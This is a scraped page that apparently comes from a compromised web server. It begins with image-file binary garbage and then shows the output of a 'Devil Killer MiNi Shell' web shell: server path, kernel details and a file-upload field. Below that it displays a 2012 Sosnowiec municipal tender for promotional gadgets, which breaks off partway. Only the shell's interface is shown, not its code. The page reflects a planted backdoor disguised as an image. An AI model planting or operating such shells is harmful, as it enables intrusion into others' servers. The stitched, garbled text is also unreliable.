JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120330/99340-N-2012.html

<p class="kh_header"><b>Sosnowiec: Wykonanie gadżetów promocyjnych z charakterystycznymi elementami miasta Sosnowca</b><br>
<b>Numer ogłoszenia: 99340 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie gadżetów promocyjnych z charakterystycznymi elementami miasta Sosnowca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostawa gadżetów promocyjnych z charakterystycznymi elementami miasta Sosnowca na potrzeby Urzędu Miejskiego.  Zakres zamówienia obejmuje: wykonanie artykułów, umiejscowienie projektów graficznych logo, oraz innych oznaczeń na zamawianych artykułach promocyjnych, transport wraz z wyładunkiem produktów do miejsca wskazanego przez zamawiającego. Dostarczone materiały promocyjne muszą być wysokiej jakości, pełnowartościowe, pierwszego gatunku, bez wad, posiadać właściwe atesty, pochodzić z bieżącej produkcji, być fabrycznie nowe i nie być przedmiotem praw osób trzecich. Wykonawca umieści materiały promocyjne w opakowaniach zapobiegających ich uszkodzeniu podczas transportu. Próbki dołączone do oferty Zamawiający dołączy tylko w częściach I -VII w części VIII nie dołącza próbek Próbki muszą spełniać wszelkie wymagania określone w opisie przedmiotu zamówienia, za wyjątkiem nadruków, logo, herbu, hasła promocyjnego oraz napisu Sosnowiec. Projekty materiałów promocyjnych zostaną wykonane przez Wykonawcę i zatwierdzone przez Zamawiającego, na podstawie przykładowego materiału promocyjnego dostarczonego do Zamawiającego w terminie 7 dni roboczych od daty podpisania umowy. Korekty wzorów zgłoszone przez Zamawiającego przed ostateczną akceptacją będą przedstawiane przez Wykonawcę w ciągu 2 dni roboczych, od dnia w którym Zamawiający zgłosił uwagi. Wykonanie zamówienia odbędzie się w terminie 30 dni od dnia ostatecznej akceptacji przez Zamawiającego przedstawionych wzorów.
Zakres przedmiotu zamówienia zostaje podzielony na 8 części : Część I - Zadanie I, Część II - Zadanie II,  Część III- Zadanie III, Część IV- Zadanie IV, Część V - Zadanie V,  Część VI- Zadanie VI Część VII - Zadanie VII,  Część VIII- Zadanie VIII  zgodnie z ZAŁĄCZNIKIEM NR I do niniejszego ogłoszenia- INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełniania tego warunku dokonywana będzie w oparciu o dotychczas wykonane usługi.
Część I - Zadanie I - Wykonaniu toreb reklamowych o łącznej wartości co najmniej 15.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część II - Zadanie II - Wykonaniu koszulek reklamowych o łącznej wartości co najmniej 20.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część III - Zadanie III - Wykonaniu długopisów reklamowych o łącznej wartości co najmniej 20.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część IV - Zadanie IV - Wykonaniu spinek do mankietów o łącznej wartości co najmniej 5.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część V - Zadanie V - Wykonaniu gadżetów reklamowych o łącznej wartości 30.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część VI - Zadanie VI - Wykonaniu krawatów o łącznej wartości 8.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część VII - Zadanie VII - Wykonaniu portfeli o łącznej wartości 7.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.
Część VIII - Zadanie VIII - Wykonaniu balonów lub bram lub namiotów pneumatycznych reklamowych o łącznej wartości 10.000 zł brutto w ciągu ostatnich trzech lat a jeśli okres działalności jest krótszy w tym okresie. Przedmiotem zamówienia może być również suma wartości usług (zleceń) pod warunkiem, że były one wykonane w ciągu jednego roku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie wymaganego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ewentualne pełnomocnictwo. Jeżeli osoba(-y) podpisująca(-ce) ofertę działa(-ją) na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazać uprawienie do podpisania oferty (pełnomocnictwo szczegółowe). Pełnomocnictwo to musi być dołączone do oferty i być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Wykonawcy chcąc wspólnie ubiegać się o zamówienie - np.: (konsorcjum) - mają obowiązek ustanowienia pełnomocnika. Pełnomocnik musi mieć upoważnienie co najmniej do reprezentowania w postępowaniu wykonawców ubiegających się wspólnie o zamówienie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian.

a)Możliwość przedłużenia terminu wykonywania zamówienia w przypadku wystąpienia:
okoliczności uniemożliwiających wykonanie w terminie przedmiotu zamówienia za które żadna ze Stron nie ponosi odpowiedzialności,
siła wyższa,
b) Dopuszcza się zmiany:
nie wykraczające poza przedmiot zamówienia (treść oferty);
miejsca rozładunku po uzgodnieniu między Stronami;
podwykonawstwa za uprzednią zgodą zamawiającego:
- powierzenia podwykonawcom innej części prac niż wskazane w ofercie wykonawcy;
- zmiana podwykonawcy na etapie realizacji prac.
Zmiany wynagrodzenia umownego:
zamawiający nie przewiduje przez okres obowiązywania umowy zmian w zakresie wynagrodzenia wykonawcy;
w przypadku jeżeli w okresie realizacji przedmiotu umowy wystąpi ustawowa zmiana stawki podatku VAT, wówczas Strony podpiszą aneks do umowy aktualizujący wynagrodzenie wykonawcy. W tym przypadku niezmienne pozostanie wynagrodzenie kosztorysowe netto wykonawcy, zaś wartość podatku VAT będzie dostosowywana do obowiązujących przepisów.
d) Nastąpi konieczność zmiany osób wykonujących  zamówienie z  następujących powodów:
- śmierci, choroby lub innych zdarzeń losowych osób wykonujących zamówienie;
- nie wywiązywania się osób wykonujących zamówienie z obowiązków wynikających z powierzonych im zadań;
- jeżeli zmiana osoby wykonującej zamówienie stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji).
Zmiana jest możliwa jedynie na nowe osoby o kwalifikacjach i doświadczeniu nie niższych niż zaproponowane przez wykonawcę w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> : Urząd Miejski w Sosnowcu, Wydział Informacji i Promocji Miasta Al. Zwycięstwa 20, piętro 1, pokój 203 lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2012 godzina 10:00, miejsce: Urząd Miejski w Sosnowcu, Wydział Informacji i Promocji Miasta Al. Zwycięstwa 20, piętro 1, pokój 203..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Torba papierowa ekologiczna - 1.000 sztuk.
1. Torba papierowa duża koloru brązowego w prążki.
2. Surowiec: papier kraft ekoprążkowany lub równoważnik o gramaturze co najmniej 100g/m2
3. Wymiary torby: ok. szer. 300x podst.120 x wys. 440mm;
4. Zdobienie: nadruk logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy w jednym kolorze zgodnie z SIW i Księgą Znaku na jednej stronie, jeden kolor na drugiej stronie, z adresem strony internetowej www.sosnowiec.pl
5. Wzmocnienie torby przy górnej zakładce oraz przy dnie; uszy papierowe wzmocnione.

2. Torba papierowa - duża - 2.000 sztuk
1. Torba papierowa duża.
2. Surowiec: karton z papieru IVORY lub równoważnik o gramaturze co najmniej 140g/m2 sznureczek biały syntetyczny.
3. Wymiary torby: wys.380 x szer. 280 x spód 120mm.
4.Zdobienie Nadruk pełny kolor obie strony.: 1 strona logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy; 2 strona nadruk adresu strony internetowej www.sosnowiec.pl,
5. wzmocnienie torby przy górnej zakładce kartonem 300 g/m2 oraz przy dnie.

3. Torba papierowa - mała - 2.000 sztuk
1.Torba papierowa mała.
2.Surowiec: papier karton z papieru IVORY lub równoważnik co najmniej 140 g/m2, laminat błyszczący, sznureczek biały syntetyczny.
3.Wymiary torby: wys. 240 mm, szer.160 mm, spód 70mm.
4.Zdobienie: Nadruk pełny kolor obie strony.: 1 strona logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy 2 strona nadruk adresu strony internetowej www.sosnowiec.pl.
5. Wzmocnienie torby przy górnej zakładce kartonem 200 g/m2 oraz przy dnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Koszulka polo - damska - 250 sztuk
1. Klasyczna koszulka polo z krótkim rękawem koloru białego, damska.
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 180 g/m2.
3. Rozmiary:
rozmiar S ,rozmiar M ,rozmiar L , rozmiar XL
4. Zdobienia:  haft z lewej strony piersi: logo Sosnowca zgodnie z SIW i Księgą Znaku - wymiar ok. 15x25mm.
5. Koszulka polo zapinane pod szyją na trzy lub dwa guziki.
6. Ściągacze na rękawach.
7. Boczne rozcięcia.

2. Koszulka polo - męska - 250 sztuk
1. Klasyczna koszulka polo z krótkim rękawem koloru granatowego, męska.
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 180 g/m2 .
3. Rozmiary: rozmiar M,  rozmiar L, rozmiar XL, rozmiar XXL.
4. Zdobienia: haft z lewej strony piersi: logo Sosnowca zgodnie z SIW i Księgą Znaku - wymiar ok. 15x25mm.
5 .Koszulka polo zapinane pod szyją na trzy lub dwa guziki.
6. Ściągacze na rękawach.
7. Boczne rozcięcia.

3. Koszulka klasyczna - 300 sztuk
1. Klasyczna koszulka koloru białego unisex.
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 185 g/m2.
3. Rozmiary: rozmiar S ,rozmiar M ,rozmiar L , rozmiar XL.
4. Zdobienia w pełnym kolorze: nadruk z prawej strony piersi:  logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku - wymiar ok. 130x115mm.
nadruk na prawym rękawku: adres strony internetowej www.sosnowiec.pl w polu prostokąta ok. 80x7mm w kolorze granatowym zgodnie z SIW i Księgą Znaku.
5. ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi, przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku.

4. Koszulka klasyczna - 300 sztuk
1. Klasyczna koszulka koloru białego unisex.
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 155 g/m2.
3. Rozmiary: rozmiar M, rozmiar L, rozmiar XL.
4. Zdobienia:
a) nadruk z prawej strony piersi:  logo Sosnowca wraz z hasłem promocyjnym Sosnowiec łączy zgodnie z SIW i Księgą Znaku - wymiar ok. 130x115mm.
b) nadruk z lewej strony piersi: wg dostarczonego wzoru wymiar ok. 130x115mm.
5. Ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi, przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku.

5. Koszulka klasyczna - 300 sztuk
1. Klasyczna koszulka koloru białego unisex,
2. Surowiec: bawełna 100%, gramatura nie mniejsza niż 185 g/m2,
3. Rozmiary: rozmiar S, rozmiar M, rozmiar L, rozmiar XL
4. Zdobienia: nadruk na koszulce z przodu wymiary ok. 230x280mm w jednym kolorze,
5.Ściągacz pod  szyją  bawełniany o elastycznym splocie, podwójny szew wokół wykroju szyi, przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca wzdłuż karku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III.</p>
